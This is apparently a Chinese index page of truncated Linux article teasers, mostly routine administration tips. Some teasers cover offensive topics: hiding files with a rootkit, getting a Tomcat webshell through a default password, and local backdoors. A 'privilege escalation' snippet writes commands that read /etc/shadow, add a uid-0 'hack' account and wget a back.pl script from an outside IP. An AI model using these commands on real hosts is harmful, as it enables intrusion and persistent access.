linux隐藏文件:一种Linux下隐藏文件的新思路方法
. 概述 目前通用隐藏文件思路方法还是hooksys_getdents64系统 大致流程就是先原始sys_getdents64系统然后在在buf中做过滤修改sys_call_table是比较原始rk技术了碰到好点管理员 基本上gdb下vmlinux就能检测出来 如何想做到更加隐蔽话就要寻找新技术 inline hook也是目前比较流行做法不容易检测本文通过讲解种利用inline hook... [阅读全文]
拿webshell:Tomcat后台拿shell
有些Tomcat安装的后没有修改默认密码(用户名admin密码为空)这样就可以直接登录进去有两个目录可以访问:/admin/manager/html/admin 目录下利用:Service--host--actions--Create New Context建立虚拟目录Document Base填你想浏览目录比如c:\Path自己随便写例如/guizai然后直接http://ip/guizai 就... [阅读全文]
linux后门:linux下留本地后门的两个思路方法
作者:xi4oyu思路方法:uid思路方法其实8是很隐蔽看看过程:[root@localdo lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 - ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb... [阅读全文]
linux服务器:讲解对Linux服务器的 4种入侵级别
随着Linux企业应用扩展有大量网络服务器使用Linux操作系统Linux服务器安全性能受到越来越多关注这里根据Linux服务器受到攻击深度以级别形式列出并提出区别解决方案 对Linux服务器攻击定义是:攻击是种旨在妨碍、损害、削弱、破坏Linux服务器安全未授权行为攻击范围可以从服务拒绝直至完全危害和破坏Linux服务器对Linux服务器攻击有许多种类本文从攻击深度角度介绍说明我们把攻击分为... [阅读全文]
linux提权:Linux提权记录
cat /etc/passwd | grep "/bin/bash"cat /etc/passwd | grep "root"echo hack:x:0:0:root:/root:/bin/bash /etc/passwdcat /etc/shadowecho hack::133380:0:99999:7::: /etc/shadowwget http://58.19.202.2x/back.pl... [阅读全文]
linux查看进程:Linux中如何让进程在后台运行
在Linux中如果要让进程在后台运行般情况下我们在命令后面加上&即可实际上这样是将命令放入到个作业队列中了:$ ./test.sh &[1] 17208$ jobs -l[1]+ 17208 Running ./test.sh &对于已经在前台执行命令也可以重新放到后台执行首先按ctrl+z暂停已经运行进程然后使用bg命令将停止作业放到后台运行:$ ./test.sh[1]+ Stopped ./... [阅读全文]
linuxroot:Linux操作系统下限制root用户登录思路方法
/etc/securetty这个文件中保存了root用户可以安全登录终端名称或telnet登录 1. 如果你希望root用户只能从tty1和tty2登录则修改/etc/securetty这个文件并只保留下面两行 [root@localhost ~]# cat /etc/securetty tty1 tty2 2. 如果你想允许用户telnet登录则加入pts/1 pts/2等修改后文件内... [阅读全文]
linuxshell编程:Linux系统下的Shell编程精讲
其实作为命令语言互动式地解释和执行用户输入命令只是Shell功能个方面Shell还可以用来进行设计它提供了定义变量和参数手段以及丰富控制结构使用Shell编程类似于DOS中批处理文件称为Shell script又叫Shell或Shell命令文件 Shell基本语法 像高级设计语言样Shell也提供介绍说明和使用变量功能对Shell来讲所有变量取值都是个字串Shell采用$var形式来引用名为va... [阅读全文]
linux服务器:对Linux服务器 4种级别入侵地简略讲解
随着Linux企业应用扩展有大量网络服务器使用Linux操作系统Linux服务器安全性能受到越来越多关注这里根据Linux服务器受到攻击深度以级别形式列出并提出区别解决方案 对Linux服务器攻击定义是:攻击是种旨在妨碍、损害、削弱、破坏Linux服务器安全未授权行为攻击范围可以从服务拒绝直至完全危害和破坏Linux服务器对Linux服务器攻击有许多种类,本文从攻击深度角度介绍说明... [阅读全文]
linux加载u盘:Linux中加载动态链接库的 3种思路方法
第种是修改系统文件: 在/etc/ld.so.conf文件中指定了默认动态链接库查找路径我/etc/ld.so.conf文件内容是这样 /etc/ld.so.conf.d/*.conf 也就是说它间接指定了定义路径文件我们只需要把需要路径加到/etc/ld.so.conf.d目录下任何个文件中再运行ldconfig就可以了但为了容易理解最好是找个相关文件或者重新建立个文件把需要添加路径写入然... [阅读全文]
shellcode:浅入浅出Liunx Shellcode
:什么是shellcode 话说某天某爱国黑客编译了个Nday溢出利用来攻击CNN输入IP并且enter的后发现目标服务器没有反应于是拿出snfer抓包分析...“Oh ,my dog!居然没有带shellcode!”为什么 shellcode对于个exploit来说这么重要呢?Shellcode到底是什么东西呢? 简单说Shellcode是段能够完成某种特定功能 2进制代码具体完成什... [阅读全文]
linuxpostgresql:实现远程连接Linux上的PostgreSQL服务器
众所周知Postgres 8.1 分别发行了 Linux和Windows 两个版本所以介绍远程连接主题时也是分别介绍这两个系统上是如何实现 其实windows版比linux版步骤少些 、实现远程连接Linux上PostgreSQL服务器 主要分两个步骤: 1要使Linux上PostgreSQL打开 “unixtcpip套接子” 编辑 $POSTGRES/data/postg... [阅读全文]
linux协议栈:对Linux网络协议栈结构的理解
Linux协议栈其实是源于BSD协议栈它向上以及向下接口以及协议栈本身软件Software分层组织非常好 Linux协议栈基于分层设计思想总共分为 4层从下往上依次是:物理层链路层网络层应用层 物理层主要提供各种连接物理设备如各种网卡串口卡等;链路层主要指是提供对物理层进行访问各种接口卡驱动如网卡驱动等;网路层作用是负责将网络数据包传输到正确位置最重要网络层协议当然就是IP协议了其... [阅读全文]
linuxc语言:C语言编写linux下的守护进程
利用网上下载这段代码成功实现了守护进程原来守护进程是很简单事情 在中执行 init_daemon;//化为Daemon 就可以把进程变成守护进程 QUOTE: # # # # # void init_daemon(void){ pid; i;(pid=fork)exit(0);//是父进程结束父进程 (pid 0)exit(1);//fork失败退出//是第子进程后台继续执行sid;/... [阅读全文]
开机启动脚本:linux 开机自动启动脚本思路方法
通过现场对这次天津iptv demo项目调测、对iptv这套系统有了更好认识和理解、由于iptv本身需要安装许多服务、而现场实施中有没有把这些需要启动服务脚本加入到开机自动运行中、如果服务器重启的后需要手工开启许多服务、工作及以后维护相对比较繁琐、特地整理总结了下linux下开机自动启动脚本所涉及知识和思路方法、如下:1、相关基础知识点 1)redhat启动方式和执行次序是: 加... [阅读全文]
文件系统损坏:Linux文件系统损坏后的修复窍门技巧详细介绍
Linux不正常关机有时候再次启动时会报文件系统损坏如何修复文件? 首先会让你输入root用户密码 1)出错时候如果告诉你是哪块硬盘分区有问题比如是/dev/hda3 接着用如下命令去对付它呀: #fsck -y /dev/hda3 结束后reboot这样就OK了! 2)如果你不知道时哪个地方出了问题(常用此种思路方法) 可以直接 #fsck 在随后多个确认对话框中输入:y 结束后reboot就o... [阅读全文]
ubuntulinux系统:Ubuntu Linux系统下查看服务器工作记录
1) 使用root登录 使用passwd root来修改root密码在系统设置安全项中设定允许管理员登录 2)远程控制:Xmanager3(图形界面) a:仅仅作为图形显示 #expore DISPLAY=IP:0.0 #./runInstaller 这样oracle安装图形界面就显示到了你所设置ip上 b:远程登录 修改/etc/gdm/gdm.conf [daemon]项下RemoteGree... [阅读全文]
十种意识:十种可以瞬间毁掉整个互联网袭击手段分析
互联网安全在今天越来越被更多人重视人们采用各种办法来保护网络安全可总也避免不了这样那样攻击、漏洞下面例举了十种可瞬间毁掉整个互联网袭击手段让大家看看也希望大家在日常上网或工作时能够注意到 1. DNS (域名解析服务)被颠覆了互联网正常运行全靠 DNS如果有人破坏——或更糟颠覆了——网站WebSite访问基石人们将会不再相信什么 URL 网址网络欺诈也将变得如同儿戏:占有 DNS 者占有互联网 ... [阅读全文]
linuxarp:让Linux系统有效防御ARP攻击
管理员用户登录打开终端输入 1、#arp -a /etc/ethers 将ip和mac地址导入ethers 2、#vi /etc/ethers 编辑文件格式ethers文件内容必须格式如下多余全部删除改成形式ip mac 192.168.1.X XX:XX:XX:XX:XX 192.168.1.X XX:XX:XX:XX:XX …… //注意mac大写而且没有O只有... [阅读全文]
认识Linux操作系统下 3大便利开源防火墙
对所有Linux系统和网络管理员来说个最基本窍门技巧是知道如何从头开始编写个强健iptables防火墙并且知道如何修改它使其适应多种区别情况然而在现实世界中这看起来似乎少的又少对iptables学习并非是个简单过程不过笔者在这里向您推荐外网上如下资料这样使用起来你就得心应手了 笔者认为所有管理员都应彻底地理解Iptables不过另外个可选择思路方法是运用出色Linux防火墙生成工具 Firew... [阅读全文]
linux系统启动过程:Linux如何在系统运行过程中修改内核参数
RedHat向管理员提供了非常好思路方法使我们可以在系统运行时更改内核参数而不需要重新引导系统这是通过/proc虚拟文件系统实现/proc/sys目录下存放着大多数内核参数并且设计成可以在系统运行同时进行更改下面我们以打开内核 ip转发功能为例介绍说明在系统运行时修改内核参数两种思路方法IP转发是指允许系统对来源和目地都不是本机数据包通过网络RedHat默认屏蔽此功能在 需要用本机作为路由器、N... [阅读全文]
linux服务器系统:解决Linux系统服务器下误删除文件的问题
服务器误删了/usr/bin和/usr/sbin目录然后从别地方拷贝这两个目录过来发现可能很多是链接等非普通文件可拷贝时候对链接处理不知道应加什么参数所以百多兆东西拷贝了近个G;最后先给tar了下在拷贝 这样服务器基本弄好建议: 1.不要直接用root登入特别是不熟悉人 2.建议需要执行root权限命令使用sudo少用su; 3.可用visudo来配置需要执行root权限命令 eg: xxx AL... [阅读全文]
黑客必学dos命令:Linux必学命令
Linux提供了大量命令利用它可以有效地完成大量工作如磁盘操作、文件存取、目录操作、进程管理、文件权限设定等所以在Linux系统上工作离不开使用系统提供命令要想真正理解Linux系统就必须从Linux命令学起通过基础命令学习可以进步理解Linux系统 区别Linux发行版命令数量不样但Linux发行版本最少命令也有200多个这里笔者把比较重要和使用频率最多命令按照它们在系统中作用分成下面 6个部分... [阅读全文]
系统进程:Linux系统进程的几个用户ID及其转换思路方法
Linux为每个进程设置了3个ID:实际用户id有效和用户id和保存设置id 有关这3个id需要注意以下几个方面: 1.只有root才能改变进程实际用户id.例如用户从终端login登陆此时login3个id都是root.然后正确输入用户名密码的后login于是uid到注册id.于是3个id都被改成了注册用户id.然后exec shell非root用户注册进入shell的后他实际用户... [阅读全文]
如何删除linux系统:在Linux系统下递归删除文件或目录的思路方法
在linux下没有类似DOS下 del/s *.dep 递归删除命令不知道是不是我还没有找到合适命令使用方法为这个在DOS下非常容易小问题我搜索了下发现这个问题是用find和rm命令组合实现因此还搜索了find语法find --help给出介绍说明太简单根本无法看懂 下面是实现思路方法不过删除前最好看下是否是想删除东西 # 删除当前目录下所有 dep 文件 find . -name *.dep -... [阅读全文]
ubuntulinux: 4步轻松搞定Ubuntu Linux下WPA无线上网
在wpa模式下如何使用无线网络 1、安装wpa_supplicant apt-get wpasupplicant 2、创建/etc/wpa_supplicant.conf包含以下内容: network={ ssid="你无线网ssid" psk="你wpa口令" key_mgmt=WPA-PSK proto=WPA pairwise=TKIP } 3、编辑/etc/network/erfaces... [阅读全文]
linux系统:为加快速度关闭Linux下不必要的系统服务
Linux系统在/etc/rc.d/init.d下定义了很多系统服务向用户提供默认情况下这些服务大多都是随机启动但是很多服务是般不需要或者是你没有进行配置就根本不起作用但由于设置成随机启动在内核加载进内存开始运行后会花时间启动这些服务相应进程从而大大降低开机速度所以你可以通过关闭这些服务从而加快开机速度 区别GNU linux版本系统服务大都样但是也会有些小区别般都提供50个左右服务 以redh... [阅读全文]
linuxvsftp配置:Linux操作系统配置Vsftp思路方法
Linux下vsftp重新安装和配置虚拟用户 重新安装和配置虚拟用户 以下都是在root用户下进行 #tar zxvf vsftpd-2.0.5.tar.gz --解压 #cd vsftpd-2.0.5.tar.gz --解压后进入vsftpd-2.0.5.tar.gz目录 # mkdir /usr/share/empty/ --VSFTPD默认设置需要个空目录:/usr/share/empty ... [阅读全文]
linuxapache配置:Fedora Linux下解决apache配置出错问题
在fedora8上安装apache tar -zxvf httpd-2.2.8.tar.gz cd httpd-2.2.8 ./configure --prefix=/usr/local/httpd make make时候出现下面,以前配没遇到过这问题 libtool: link: `passwd/apr_getpass.lo' is not a valid libtool object mak... [阅读全文]
linux启动ssh:Linux操作系统上SSH无法启动
在机器上直接登录问题显示如下: /var/empty/sshd must be owned by root and not group or world-writable. 问题: Linux上SSH无法启动 报告/var/empty/sshd must be owned by root and not group or world-writable. 解决办法: 首先通过物理终端进入到lin... [阅读全文]
